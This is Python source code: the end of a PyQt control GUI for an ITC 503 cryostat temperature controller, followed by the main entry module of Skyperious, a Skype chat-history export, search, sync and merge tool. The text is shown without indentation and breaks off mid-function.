# if not self.data['Sensor_1_K'] is None:
self.lcdTemp_sens1_K.display(self.data["Sensor_1_K"])
# if not self.data['Sensor_2_K'] is None:
self.lcdTemp_sens2_K.display(self.data["Sensor_2_K"])
# if not self.data['Sensor_3_K'] is None:
self.lcdTemp_sens3_K.display(self.data["Sensor_3_K"])
# if not self.data['set_temperature'] is None:
self.lcdTemp_set.display(self.data["set_temperature"])
# if not self.data['temperature_error'] is None:
self.lcdTemp_err.display(self.data["temperature_error"])
# if not self.data['heater_output_as_percent'] is None:
try:
self.progressHeaterPercent.setValue(
int(self.data["heater_output_as_percent"])
)
# if not self.data['gas_flow_output'] is None:
self.progressNeedleValve.setValue(int(self.data["gas_flow_output"]))
except ValueError:
pass
# if not self.data['heater_output_as_voltage'] is None:
self.lcdHeaterVoltage.display(self.data["heater_output_as_voltage"])
# if not self.data['gas_flow_output'] is None:
self.lcdNeedleValve_percent.display(self.data["gas_flow_output"])
# if not self.data['proportional_band'] is None:
self.lcdProportionalID.display(self.data["proportional_band"])
# if not self.data['integral_action_time'] is None:
self.lcdPIntegrationD.display(self.data["integral_action_time"])
# if not self.data['derivative_action_time'] is None:
self.lcdPIDerivative.display(self.data["derivative_action_time"])
self.lcdTemp_sens1_calcerr_K.display(self.data["Sensor_1_calerr_K"])
self.combosetAutocontrol.setCurrentIndex(self.data["autocontrol"])
def load_settings(self):
"""load all settings store in the QSettings
set corresponding values in the 'Global Settings' window"""
settings = QSettings("TUW", "CryostatGUI")
try:
self._useAutoPID = bool(settings.value("ITC_useAutoPID", int))
self._PIDFile = settings.value("ITC_PIDFile", str)
except KeyError as e:
QTimer.singleShot(20 * 1e3, self.load_settings)
# self.show_error_general(f'could not find a key: {e}')
self._logger.warning(f"key {e} was not found in the settings")
del settings
self.checkUseAuto.setChecked(self._useAutoPID)
if isinstance(self._PIDFile, str):
text = self._PIDFile
else:
text = ""
self.lineConfFile.setText(text)
self.fun_PIDFile_read()
def fun_useAutoPID(self, boolean):
"""set the variable for the softwareAutoPID
emit signal to notify Thread
store it in settings"""
self._useAutoPID = boolean
self.sig_useAutocheck.emit(boolean)
settings = QSettings("TUW", "CryostatGUI")
settings.setValue("ITC_useAutoPID", int(boolean))
del settings
@ExceptionHandling
def fun_PIDFile_send(self, dummy):
"""reaction to signal: ITC PID file: send and store permanently"""
if isinstance(self._PIDFile, str):
text = self._PIDFile
else:
text = ""
self.sig_newFilePID.emit(text)
settings = QSettings("TUW", "CryostatGUI")
settings.setValue("ITC_PIDFile", self._PIDFile)
del settings
self.fun_PIDFile_read()
@ExceptionHandling
def fun_PIDFile_read(self):
try:
with open(self._PIDFile) as f:
self.textConfShow_current.setText(f.read())
except OSError as e:
self._logger.exception(e)
except TypeError as e:
self._logger.error(f"missing Filename! (TypeError: {e})")
@ExceptionHandling
def window_FileDialogOpen(self, test):
# print(test)
fname, __ = QtWidgets.QFileDialog.getOpenFileName(
self, "Choose PID configuration file", "c:\\", ".conf(*.conf)"
)
self.lineConfFile.setText(fname)
self._PIDFile = fname
# self.setValue('general', 'logfile_location', fname)
try:
with open(fname) as f:
self.textConfShow.setText(f.read())
except OSError as e:
self._logger.exception(e)
except TypeError as e:
self._logger.error(f"missing Filename! (TypeError: {e})")
if __name__ == "__main__":
print(
"please use the program 'start_XXX.py' to start communicating with this device!"
)
# logger = logging.getLogger()
# logger.setLevel(logging.DEBUG)
# logger_2 = logging.getLogger("pyvisa")
# logger_2.setLevel(logging.INFO)
# logger_3 = logging.getLogger("PyQt5")
# logger_3.setLevel(logging.INFO)
# handler = logging.StreamHandler(sys.stdout)
# handler.setLevel(logging.DEBUG)
# formatter = logging.Formatter(
# "%(asctime)s - %(levelname)s - %(name)s - %(funcName)s - %(message)s"
# )
# handler.setFormatter(formatter)
# logger.addHandler(handler)
# logger_2.addHandler(handler)
# logger_3.addHandler(handler)
# app = QtWidgets.QApplication(sys.argv)
# ITC_Instrumentadress = "ASRL6::INSTR"
# form = ITCGUI(
# ui_file="itc503_main.ui",
# Name="ITC 503",
# identity="ITC",
# InstrumentAddress=ITC_Instrumentadress,
# prometheus_port=8001,
# )
# form.show()
# # print('date: ', dt.datetime.now(),
# # '\nstartup time: ', time.time() - a)
# sys.exit(app.exec_())
|
main.py
|
# -*- coding: utf-8 -*-
"""
Skyperious main program entrance: launches GUI application or executes command
line interface, handles logging and status calls.
------------------------------------------------------------------------------
This file is part of Skyperious - Skype chat history tool.
Released under the MIT License.
@author Erki Suurjaak
@created 26.11.2011
@modified 19.09.2020
------------------------------------------------------------------------------
"""
from __future__ import print_function
import argparse
import atexit
import codecs
import collections
import datetime
import errno
import getpass
import glob
import locale
import logging
import io
import itertools
import Queue
import os
import shutil
import sys
import threading
import time
import traceback
import warnings
try:
import wx
is_gui_possible = True
except ImportError:
is_gui_possible = False
try: # For printing to a console from a packaged Windows binary
import win32console
except ImportError:
win32console = None
from . lib import util
from . import conf
from . import export
from . import guibase
from . import live
from . import skypedata
from . import workers
if is_gui_possible:
from . import gui
def date(s): return datetime.datetime.strptime(s, "%Y-%m-%d").date()
ARGUMENTS = {
"description": "%s - Skype chat history tool." % conf.Title,
"arguments": [
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"},
{"args": ["-v", "--version"], "action": "version",
"version": "%s %s, %s." % (conf.Title, conf.Version, conf.VersionDate)}],
"commands": [
{"name": "export",
"help": "export Skype databases as HTML, text or spreadsheet",
"description": "Export all message history from a Skype database "
"into files under a new folder" + (", or a single Excel "
"workbook with chats on separate sheets."
if export.xlsxwriter else ""),
"arguments": [
{"args": ["-t", "--type"], "dest": "type",
"choices": ["html", "xlsx", "csv", "txt", "xlsx_single"]
if export.xlsxwriter else ["html", "csv", "txt"],
"default": "html", "required": False,
"help": "export type: HTML files (default), Excel workbooks, "
"CSV spreadsheets, text files, or a single Excel "
"workbook with separate sheets" if export.xlsxwriter
else
"export type: HTML files (default), CSV spreadsheets, "
"text files"},
{"args": ["FILE"], "nargs": "+",
"help": "one or more Skype databases to export"},
{"args": ["-o", "--output"], "dest": "output_dir",
"metavar": "DIR", "required": False,
"help": "Output directory if not current directory"},
{"args": ["-c", "--chat"], "dest": "chat", "required": False,
"help": "names of specific chats to export", "nargs": "+"},
{"args": ["-a", "--author"], "dest": "author", "required": False,
"help": "names of specific authors whose chats to export",
"nargs": "+"},
{"args": ["-s", "--start"], "dest": "start_date", "required": False,
"help": "date to export messages from, as YYYY-MM-DD", "type": date},
{"args": ["-e", "--end"], "dest": "end_date", "required": False,
"help": "date to export messages until, as YYYY-MM-DD", "type": date},
{"args": ["--images-folder"], "dest": "images_folder",
"action": "store_true", "required": False,
"help": "save images into a subfolder in HTML export "
"instead of embedding into HTML"},
{"args": ["--ask-password"], "dest": "ask_password",
"action": "store_true", "required": False,
"help": "prompt for Skype password on HTML export "
"to download shared images"},
{"args": ["--store-password"], "dest": "store_password",
"action": "store_true", "required": False,
"help": "store entered password in configuration"},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ],
},
{"name": "search",
"help": "search Skype databases for messages or data",
"description": "Search Skype databases for messages, chat or contact "
"information, or table data.",
"arguments": [
{"args": ["-t", "--type"], "dest": "type", "required": False,
"choices": ["message", "contact", "chat", "table"],
"default": "message",
"help": "search in message body (default), in contact "
"information, in chat title and participants, or in any "
"database table"},
{"args": ["QUERY"],
"help": "search query, with a Google-like syntax, for example: "
"\"this OR that chat:links from:john\". More on syntax "
"at https://suurjaak.github.io/Skyperious/help.html. " },
{"args": ["FILE"], "nargs": "+",
"help": "Skype database file(s) to search"},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ],
},
{"name": "sync",
"help": "download new messages from Skype online service",
"description": "Synchronize Skype database via login to Skype online service.",
"arguments": [
{"args": ["-u", "--username"], "dest": "username",
"help": "username for Skype account, used only if the Skype database "
"does not contain account information yet"},
{"args": ["-p", "--password"], "dest": "password",
"help": "password for Skype account, if not using stored or prompted"},
{"args": ["--ask-password"], "dest": "ask_password",
"action": "store_true", "required": False,
"help": "prompt for Skype account password"},
{"args": ["--store-password"], "dest": "store_password",
"action": "store_true", "required": False,
"help": "store given password in configuration"},
{"args": ["-c", "--chat"], "dest": "chat", "required": False,
"help": "names of specific chats to sync", "nargs": "+"},
{"args": ["-a", "--author"], "dest": "author", "required": False,
"help": "names of specific authors whose chats to sync",
"nargs": "+"},
{"args": ["FILE"], "nargs": "+",
"help": "Skype database file to sync, "
"will be created if it does not exist yet"},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ],
},
{"name": "create",
"help": "create a new database",
"description": "Create a new blank database, or populated from "
"Skype online service, or from a Skype export archive.",
"arguments": [
{"args": ["-i", "--input"], "dest": "input",
"help": "Skype export archive to populate from (*.json;*.tar)"},
{"args": ["-u", "--username"], "dest": "username",
"help": "Skype username, for a blank database if no password"},
{"args": ["-p", "--password"], "dest": "password",
"help": "password for populating database from Skype online service"},
{"args": ["--ask-password"], "dest": "ask_password",
"action": "store_true", "required": False,
"help": "prompt for Skype account password"},
{"args": ["--store-password"], "dest": "store_password",
"action": "store_true", "required": False,
"help": "store given password in configuration"},
{"args": ["FILE"], "nargs": 1,
"help": "Skype database file to create. Overwritten if exists."},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ]
},
{"name": "merge", "help": "merge two or more Skype databases "
"into a new database",
"description": "Merge two or more Skype database files into a new "
"database in current directory, with a full combined "
"message history. New filename will be generated "
"automatically. Last database in the list will "
"be used as base for comparison.",
"arguments": [
{"args": ["FILE1"], "metavar": "FILE1", "nargs": 1,
"help": "first Skype database"},
{"args": ["FILE2"], "metavar": "FILE2", "nargs": "+",
"help": "more Skype databases"},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"},
{"args": ["-o", "--output"], "dest": "output", "required": False,
"help": "Final database filename, auto-generated by default"}, ]
},
{"name": "diff", "help": "compare chat history in two Skype databases",
"description": "Compare two Skype databases for differences "
"in chat history.",
"arguments": [
{"args": ["FILE1"], "help": "first Skype database", "nargs": 1},
{"args": ["FILE2"], "help": "second Skype databases", "nargs": 1},
{"args": ["--verbose"], "action": "store_true",
"help": "print detailed progress messages to stderr"}, ],
},
{"name": "gui",
"help": "launch Skyperious graphical program (default option)",
"description": "Launch Skyperious graphical program (default option)",
"arguments": [
{"args": ["FILE"], "nargs": "*",
"help": "Skype database to open on startup, if any"}, ]
},
],
}
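# Sketch of how a declarative structure like ARGUMENTS can be mapped onto
# argparse (the actual parser construction happens in main(), outside this
# excerpt; this block is only an illustration of the intended mapping):
#
#     argparser = argparse.ArgumentParser(description=ARGUMENTS["description"])
#     for arg in ARGUMENTS["arguments"]:
#         opts = dict(arg)
#         argparser.add_argument(*opts.pop("args"), **opts)
#     subparsers = argparser.add_subparsers(dest="command")
#     for cmd in ARGUMENTS["commands"]:
#         kwargs = dict((k, cmd[k]) for k in ("help", "description") if k in cmd)
#         subparser = subparsers.add_parser(cmd["name"], **kwargs)
#         for arg in cmd["arguments"]:
#             opts = dict(arg)
#             subparser.add_argument(*opts.pop("args"), **opts)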
logger = logging.getLogger(__package__)
window = None # Application main window instance
def except_hook(etype, evalue, etrace):
"""Handler for all unhandled exceptions."""
mqueue = getattr(except_hook, "queue", [])
setattr(except_hook, "queue", mqueue)
text = "".join(traceback.format_exception(etype, evalue, etrace)).strip()
log = "An unexpected error has occurred:\n\n%s"
logger.error(log, text)
if not conf.PopupUnexpectedErrors: return
conf.UnexpectedErrorCount += 1
msg = "An unexpected error has occurred:\n\n%s\n\n" \
"See log for full details." % util.format_exc(evalue)
mqueue.append(msg)
def after():
if not mqueue: return
msg = mqueue[0]
dlg = wx.RichMessageDialog(None, msg, conf.Title, wx.OK | wx.ICON_ERROR)
if conf.UnexpectedErrorCount > 2:
dlg.ShowCheckBox("&Do not pop up further errors")
dlg.ShowModal()
if dlg.IsCheckBoxChecked():
conf.PopupUnexpectedErrors = False
del mqueue[:]
conf.save()
if mqueue: mqueue.pop(0)
if mqueue and conf.PopupUnexpectedErrors: wx.CallAfter(after)
if len(mqueue) < 2: wx.CallAfter(after)
def install_thread_excepthook():
"""
Workaround for sys.excepthook not catching threading exceptions.
@from https://bugs.python.org/issue1230540
"""
init_old = threading.Thread.__init__
def init(self, *args, **kwargs):
init_old(self, *args, **kwargs)
run_old = self.run
def run_with_except_hook(*a, **b):
try: run_old(*a, **b)
except Exception: sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def run_merge(filenames, output_filename=None):
"""Merges all Skype databases to a new database."""
dbs = [skypedata.SkypeDatabase(f) for f in filenames]
db_base = dbs.pop()
counts = collections.defaultdict(lambda: collections.defaultdict(int))
postbacks = Queue.Queue()
name, ext = os.path.splitext(os.path.basename(db_base.filename))
now = datetime.datetime.now().strftime("%Y%m%d")
if not output_filename:
output_filename = util.unique_path("%s.merged.%s%s" % (name, now, ext))
output("Creating %s, using %s as base." % (output_filename, db_base))
bar = ProgressBar()
bar.start()
shutil.copyfile(db_base.filename, output_filename)
db2 = skypedata.SkypeDatabase(output_filename)
chats2 = db2.get_conversations()
db2.get_conversations_stats(chats2)
args = {"db2": db2, "type": "diff_merge_left"}
worker = workers.MergeThread(postbacks.put)
try:
for db1 in dbs:
chats = db1.get_conversations()
db1.get_conversations_stats(chats)
bar.afterword = " Processing %.*s.." % (30, db1)
worker.work(dict(args, db1=db1, chats=chats))
while True:
result = postbacks.get()
if "error" in result:
output("Error merging %s:\n\n%s" % (db1, result["error"]))
db1 = None # Signal for global break
break # while True
if "done" in result:
break # while True
if "diff" in result:
counts[db1]["chats"] += 1
counts[db1]["msgs"] += len(result["diff"]["messages"])
if "index" in result:
bar.max = result["count"]
bar.update(result["index"])
if result.get("output"):
logger.info(result["output"])
if not db1:
break # for db1
bar.stop()
bar.afterword = " Processed %s." % db1
bar.update(bar.max)
output()
finally:
worker and (worker.stop(), worker.join())
if not counts:
output("Nothing new to merge.")
db2.close()
os.unlink(output_filename)
else:
for db1 in dbs:
output("Merged %s in %s from %s." %
(util.plural("message", counts[db1]["msgs"]),
util.plural("chat", counts[db1]["chats"]), db1))
output("Merge into %s complete." % db2)
db2.close()
def run_search(filenames, query):
"""Searches the specified databases for specified query."""
dbs = [skypedata.SkypeDatabase(f) for f in filenames]
postbacks = Queue.Queue()
args = {"text": query, "table": "messages", "output": "text"}
worker = workers.SearchThread(postbacks.put)
try:
for db in dbs:
logger.info('Searching "%s" in %s.', query, db)
worker.work(dict(args, db=db))
while True:
result = postbacks.get()
if "error" in result:
output("Error searching %s:\n\n%s" %
(db, result.get("error_short", result["error"])))
break # while True
if "done" in result:
logger.info("Finished searching for \"%s\" in %s.", query, db)
break # while True
if result.get("count", 0) or conf.IsCLIVerbose:
if len(dbs) > 1:
output("%s:" % db, end=" ")
output(result["output"])
finally:
worker and (worker.stop(), worker.join())
def run_sync(filenames, username=None, password=None, ask_password=False,
store_password=False, chatnames=(), authornames=(), truncate=False):
"""Synchronizes history in specified database from Skype online service."""
ns = {"bar": None, "chat_title": None, "filename": None}
enc = sys.stdout.encoding or locale.getpreferredencoding() or "utf-8"
def progress(result=None, **kwargs):
result = result or kwargs
if "error" in result:
if ns["bar"]: ns["bar"] = ns["bar"].stop()
output("\nError syncing chat history: %(error)s" % result)
elif "contacts" == result.get("table"):
if result.get("start"):
ns["bar"] = ProgressBar(afterword=" Synchronizing contacts..")
ns["bar"].start()
elif result.get("end"):
t = ", ".join("%s %s" % (result[k], k) for k in ("new", "updated") if result[k])
ns["bar"].afterword = " Synchronized contacts%s." % (": %s" % t if t else "")
ns["bar"].update(result["total"])
ns["bar"] = ns["bar"].stop()
else:
ns["bar"].max = result["total"]
if "count" in result:
t = (", %s new" % result["new"]) if result["new"] else ""
ns["bar"].afterword = " Synchronizing contacts, %s processed%s." % (result["count"], t)
ns["bar"].update(result["count"])
elif "chats" == result.get("table"):
if result.get("start"):
output("\nSynchronizing chats..")
elif result.get("end"):
ns["bar"] = ns["bar"].stop()
output("\n\nSynchronized %s%s in %s: %s in total%s." % (
util.plural("chat", result["count"]) if result["count"] else "chats",
" (%s new)" % result["new"] if result["new"] else "",
ns["filename"],
util.plural("new message", result["message_count_new"]),
", %s updated" % result["message_count_updated"] if result["message_count_updated"] else ""
))
elif "messages" == result.get("table"):
if result.get("start"):
cc = db.get_conversations(chatidentities=[result["chat"]], reload=True, log=False)
chat = cc[0] if cc else None
title = chat["title_long_lc"] if chat else result["chat"]
if isinstance(title, unicode):
# Use encoded title for length constraint to work,
# if output would introduce escape sequences.
title2 = title.encode(enc, errors="backslashreplace")
if len(title2) != len(title): title = title2
if len(title) > 25:
title = title[:25] + ".."
if chat and skypedata.CHATS_TYPE_GROUP == chat["type"]: title += '"'
ns["chat_title"] = title
if ns["bar"]:
ns["bar"].pulse_pos = 0
ns["bar"].pause = False
ns["bar"].afterword = " Synchronizing %s" % title
else:
ns["bar"] = ProgressBar(pulse=True, interval=0.05,
afterword=" Synchronizing %s" % title)
ns["bar"].start()
elif result.get("end"):
t = ""
if any(result[k] for k in ("new", "updated")):
t += ": %s new" % result["new"]
if result["updated"]: t += ", %s updated" % result["updated"]
ns["bar"].afterword = " Synchronized %s%s." % (ns["chat_title"], t)
ns["bar"].pulse_pos = None
ns["bar"].pause = True
ns["bar"].update()
if t: output() # Force new line if chat got updated
else:
t = ""
for k in "new", "updated":
if result.get(k): t += ", %s %s" % (result[k], k)
if t: t += "."
ns["bar"].afterword = " Synchronizing %s%s" % (ns["chat_title"], t)
return True
username0, password0, passwords = username, password, {}
for filename in filenames:
filepath = os.path.realpath(filename)
file_existed = os.path.exists(filepath)
output("\nSynchronizing %s from live." % filename)
username = username0
prompt = "%s does not exist, enter Skype username: " % filename
while not file_existed and not username:
output(prompt, end="")
username = raw_input().strip()
db = skypedata.SkypeDatabase(filepath, truncate=not file_existed or truncate)
username = db.username or username
password = password0 or passwords.get(username)
prompt = "%s does not contain account information, enter Skype username: " % filename
while not username:
output(prompt, end="")
username = raw_input().strip()
if username: break # while not username
if not password and not ask_password \
and conf.Login.get(filepath, {}).get("password"):
password = util.deobfuscate(conf.Login[filepath]["password"])
prompt = "Enter Skype password for '%s': " % username
while not db.live.is_logged_in():
if ask_password or not password: password = get_password(username)
passwords[username] = password
output("Logging in to Skype as '%s'.." % username, end="")
try: db.live.login(username, password)
except Exception as e:
prompt = "\n%s\n%s" % (util.format_exc(e), prompt)
else: output(" success!")
if store_password:
conf.Login.setdefault(filepath, {})
conf.Login[filepath].update(store=True, password=util.obfuscate(password))
conf.save()
chats = []
if chatnames or authornames:
cc = db.get_conversations(chatnames, authornames)
chats = [c["identity"] for c in cc]
output()
db.live.progress = progress
ns["filename"] = filename
try: db.live.populate(chats)
except Exception as e: progress(error=util.format_exc(e))
db.close()
def run_create(filenames, input=None, username=None, password=None,
ask_password=False, store_password=False):
"""Creates a new database, blank or from a Skype source."""
if not input and not username:
output("Not enough arguments.")
sys.exit(1)
if not input and username and (password or ask_password): return run_sync(
filenames, username, password, ask_password, store_password, truncate=True
)
filename = os.path.realpath(filenames[0])
if not input: # Create blank database, with just account username
logger.info("Creating new blank database %s for user '%s'.", filename, username)
db = skypedata.SkypeDatabase(filename, truncate=True)
for table in db.CREATE_STATEMENTS: db.create_table(table)
db.insert_account({"skypename": username})
output("Created blank database %s for user %s." % (filename, username))
return
counts = {}
def progress(result=None, **kwargs):
result = result or kwargs
if "counts" in result:
counts.update(result["counts"])
t = ", ".join(util.plural(x[:-1], counts[x], sep=",")
for x in sorted(counts))
bar.afterword = " Imported %s." % t
return True
username = live.SkypeExport.export_get_account(input)
db = live.SkypeExport(input, filename)
if ask_password and store_password: password = get_password(username)
logger.info("Creating new database %s from Skype export %s, user '%s'.",
filename, input, username)
output()
bar = ProgressBar(pulse=True, interval=0.05)
bar.afterword =" Importing %s" % filename
bar.start()
try: db.export_read(progress)
except Exception:
logger.exception("Error importing Skype export archive %s.", filename)
util.try_ignore(db.close)
util.try_ignore(os.unlink, filename)
raise
bar.stop()
bar.pulse = False
bar.update(100)
db.close()
if password and store_password:
conf.Login.setdefault(filename, {})
conf.Login[filename].update(store=True, password=util.obfuscate(password))
conf.save()
sz = util.format_bytes(os.path.getsize(filename))
t = " and ".join(util.plural(x[:-1], counts[x], sep=",") for x in sorted(counts))
output("\n\nCreated new database %s from Skype export archive %s." % (filename, input))
output("Database size %s, username '%s', with %s." % (sz, db.username, t))
def run_export(filenames, format, output_dir, chatnames, authornames,
start_date, end_date, images_folder, ask_password, store_password):
"""Exports the specified databases in specified format."""
dbs = [skypedata.SkypeDatabase(f) for f in filenames]
is_xlsx_single = ("xlsx_single" == format)
timerange = map(util.datetime_to_epoch, (start_date, end_date))
output_dir = output_dir or os.getcwd()
for db in dbs:
if ask_password and db.username and conf.SharedImageAutoDownload \
and "html" == format:
while not db.live.is_logged_in():
password = get_password(db.username)
try: db.live.login(password=password)
except Exception as e: output("\n" + util.format_exc(e))
if store_password:
conf.Login.setdefault(db.filename, {})
conf.Login[db.filename].update(store=True, password=util.obfuscate(password))
conf.save()
formatargs = collections.defaultdict(str)
formatargs["skypename"] = os.path.basename(db.filename)
formatargs.update(db.account or {})
basename = util.safe_filename(conf.ExportDbTemplate % formatargs)
dbstr = "from %s " % db if len(dbs) != 1 else ""
if is_xlsx_single:
path = os.path.join(output_dir, "%s.xlsx" % basename)
else:
path = os.path.join(output_dir, basename)
path = util.unique_path(path)
try:
extras = [("", chatnames)] if chatnames else []
extras += [(" with authors", authornames)] if authornames else []
output("Exporting%s%s as %s %sto %s." %
(" chats" if extras else "",
",".join("%s like %s" % (x, y) for x, y in extras),
format[:4].upper(), dbstr, path))
chats = sorted(db.get_conversations(chatnames, authornames),
key=lambda x: x["title"].lower())
db.get_conversations_stats(chats)
bar_total = sum(c["message_count"] for c in chats)
bartext = " Exporting %.*s.." % (30, db.filename) # Enforce width
pulse = any(x is not None for x in timerange)
bar = ProgressBar(max=bar_total, afterword=bartext, pulse=pulse)
bar.start()
opts = dict(progress=bar.update, timerange=timerange)
if images_folder: opts["images_folder"] = True
result = export.export_chats(chats, path, format, db, opts)
files, count, message_count = result
bar.stop()
if count:
bar.afterword = " Exported %s from %s to %s. " % (
util.plural("message", message_count), db, path)
bar.update(bar_total)
output()
logger.info("Exported %s and %s %sto %s as %s.",
util.plural("chat", count),
util.plural("message", message_count),
dbstr, path, format[:4].upper())
else:
output("\nNo messages to export%s." %
("" if len(dbs) == 1 else " from %s" % db))
util.try_ignore((os.unlink if is_xlsx_single else os.rmdir), path)
except Exception as e:
output("Error exporting chats: %s\n\n%s" %
(e, traceback.format_exc()))
def run_diff(filename1, filename2):
"""Compares the first database for changes with the second."""
if os.path.realpath(filename1) == os.path.realpath(filename2):
output("Error: cannot compare %s with itself." % filename1)
return
db1, db2 = map(skypedata.SkypeDatabase, [filename1, filename2])
counts = collections.defaultdict(lambda: collections.defaultdict(int))
postbacks = Queue.Queue()
bar_text = "%.*s.." % (50, " Scanning %s vs %s" % (db1, db2))
bar = ProgressBar(afterword=bar_text)
bar.start()
chats1, chats2 = db1.get_conversations(), db2.get_conversations()
db1.get_conversations_stats(chats1), db2.get_conversations_stats(chats2)
args = {"db1": db1, "db2": db2, "chats": chats1, "type": "diff_left"}
worker = workers.MergeThread(postbacks.put)
try:
worker.work(args)
while True:
result = postbacks.get()
if "error" in result:
output("Error scanning %s and %s:\n\n%s" %
(db1, db2, result["error"]))
break # while True
if "done" in result:
break # while True
if "chats" in result and result["chats"]:
counts[db1]["chats"] += 1
msgs = len(result["chats"][0]["diff"]["messages"])
msgs_text = util.plural("new message", msgs)
contacts_text = util.plural("new participant",
result["chats"][0]["diff"]["participants"])
text = ", ".join(filter(None, [msgs_text, contacts_text]))
bar.afterword = (" %s, %s." % (result["chats"][0]["chat"]["title"],
text))
counts[db1]["msgs"] += msgs
if "index" in result:
bar.max = result["count"]
bar.update(result["index"])
if result.get("output"):
logger.info(result["output"])
finally:
worker and (worker.stop(), worker.join())
bar.stop()
bar.afterword = " Scanned %s and %s." % (db1, db2)
bar.update(bar.max)
output()
def run_gui(filenames):
"""Main GUI program entrance."""
global logger, window
# Set up logging to GUI log window
logger.addHandler(guibase.GUILogHandler())
logger.setLevel(logging.DEBUG)
install_thread_excepthook()
sys.excepthook = except_hook
# Create application main window
app = wx.App(redirect=True) # stdout and stderr redirected to wx popup
# Avoid dialog buttons in native language
mylocale = wx.Locale(wx.LANGUAGE_ENGLISH_US, wx.LOCALE_LOAD_DEFAULT)
mylocale.AddCatalog("wxstd")
window = gui.MainWindow()
app.SetTopWindow(window) # stdout/stderr popup closes with MainWindow
# Some debugging support
window.run_console("import datetime, os, re, time, sys, wx")
window.run_console("# All %s modules:" % conf.Title)
window.run_console("from skyperious import conf, emoticons, export, "
"gui, guibase, images, live, main, searchparser, "
"skypedata, support, templates, workers")
window.run_console("from skyperious.lib import controls, util, wordcloud, wx_accel")
window.run_console("self = wx.GetApp().TopWindow # Application main window instance")
logger.info("Started application.")
for f in filter(os.path.isfile, filenames):
wx.CallAfter(wx.PostEvent, window, gui.OpenDatabaseEvent(file=f))
app.MainLoop()
def run(nogui=False):
"""Parses command-line arguments and either runs GUI, or a CLI action."""
global is_gui_possible, logger
warnings.simplefilter("ignore", UnicodeWarning)
if (getattr(sys, 'frozen', False) # Binary application
or sys.executable.lower().endswith("pythonw.exe")):
sys.stdout = ConsoleWriter(sys.stdout) # Hooks for attaching to
sys.stderr = ConsoleWriter(sys.stderr) # a text console
if "main" not in sys.modules: # E.g. setuptools install, calling main.run
srcdir = os.path.abspath(os.path.dirname(__file__))
if srcdir not in sys.path: sys.path.append(srcdir)
#sys.modules["main"] = __import__("main")
argparser = argparse.ArgumentParser(description=ARGUMENTS["description"])
for arg in ARGUMENTS["arguments"]:
argparser.add_argument(*arg.pop("args"), **arg)
subparsers = argparser.add_subparsers(dest="command")
for cmd in ARGUMENTS["commands"]:
kwargs = dict((k, cmd[k]) for k in cmd if k in ["help", "description"])
subparser = subparsers.add_parser(cmd["name"], **kwargs)
for arg in cmd["arguments"]:
kwargs = dict((k, arg[k]) for k in arg if k != "args")
subparser.add_argument(*arg["args"], **kwargs)
if "nt" == os.name: # Fix Unicode arguments, otherwise converted to ?
sys.argv[:] = win32_unicode_argv()
argv = sys.argv[1:]
if not argv or (argv[0] not in subparsers.choices
and argv[0].endswith(".db")):
argv[:0] = ["gui"] # argparse hack: force default argument
if argv[0] in ("-h", "--help") and len(argv) > 1:
argv[:2] = argv[:2][::-1] # Swap "-h option" to "option -h"
arguments, _ = argparser.parse_known_args(argv)
if hasattr(arguments, "FILE1") and hasattr(arguments, "FILE2"):
arguments.FILE1 = [util.to_unicode(f) for f in arguments.FILE1]
arguments.FILE2 = [util.to_unicode(f) for f in arguments.FILE2]
arguments.FILE = arguments.FILE1 + arguments.FILE2
if arguments.FILE: # Expand wildcards to actual filenames
arguments.FILE = sum([glob.glob(f) if "*" in f else [f]
for f in arguments.FILE], [])
arguments.FILE = sorted(set(util.to_unicode(f) for f in arguments.FILE))
conf.load()
if "gui" == arguments.command and (nogui or not is_gui_possible):
argparser.print_help()
status = None
if not nogui: status = ("\n\nwxPython not found. %s graphical program "
"will not run." % conf.Title)
sys.exit(status)
elif "gui" != arguments.command:
conf.IsCLI = True
conf.IsCLIVerbose = arguments.verbose
# Avoid Unicode errors when printing to console.
enc = sys.stdout.encoding or locale.getpreferredencoding() or "utf-8"
sys.stdout = codecs.getwriter(enc)(sys.stdout, "backslashreplace")
sys.stderr = codecs.getwriter(enc)(sys.stderr, "backslashreplace")
if conf.IsCLIVerbose:
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(logging.Formatter("%(asctime)s\t%(message)s"))
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
else:
logger.addHandler(logging.NullHandler())
if "create" == arguments.command:
run_create(arguments.FILE, arguments.input,
arguments.username, arguments.password,
arguments.ask_password, arguments.store_password)
elif "diff" == arguments.command:
run_diff(*arguments.FILE)
elif "merge" == arguments.command:
run_merge(arguments.FILE, arguments.output)
elif "export" == arguments.command:
run_export(arguments.FILE, arguments.type, arguments.output,
arguments.chat, arguments.author, arguments.start_date,
arguments.end_date, arguments.images_folder,
arguments.ask_password, arguments.store_password)
elif "search" == arguments.command:
run_search(arguments.FILE, arguments.QUERY)
elif "sync" == arguments.command:
run_sync(arguments.FILE, arguments.username, arguments.password,
arguments.ask_password, arguments.store_password,
arguments.chat, arguments.author)
elif "gui" == arguments.command:
run_gui(arguments.FILE)
class ConsoleWriter(object):
"""
Wrapper for sys.stdout/stderr, attaches to the parent console or creates
a new command console, usable from python.exe, pythonw.exe or
compiled binary. Hooks application exit to wait for final user input.
"""
handle = None # note: class variables
is_loaded = False
realwrite = None
def __init__(self, stream):
"""
@param stream sys.stdout or sys.stderr
"""
self.encoding = getattr(stream, "encoding", locale.getpreferredencoding())
self.stream = stream
def flush(self):
if not ConsoleWriter.handle and ConsoleWriter.is_loaded:
self.stream.flush()
elif hasattr(ConsoleWriter.handle, "flush"):
ConsoleWriter.handle.flush()
def write(self, text):
"""
Prints text to console window. GUI application will need to attach to
the calling console, or launch a new console if not available.
"""
global window
if not window and win32console:
if not ConsoleWriter.is_loaded and not ConsoleWriter.handle:
self.init_console()
try: self.realwrite(text), self.flush()
except Exception: self.stream.write(text)
else:
self.stream.write(text)
def init_console(self):
"""Sets up connection to console."""
try:
win32console.AttachConsole(-1) # pythonw.exe from console
atexit.register(lambda: ConsoleWriter.realwrite("\n"))
except Exception:
pass # Okay if fails: can be python.exe from console
try:
handle = win32console.GetStdHandle(
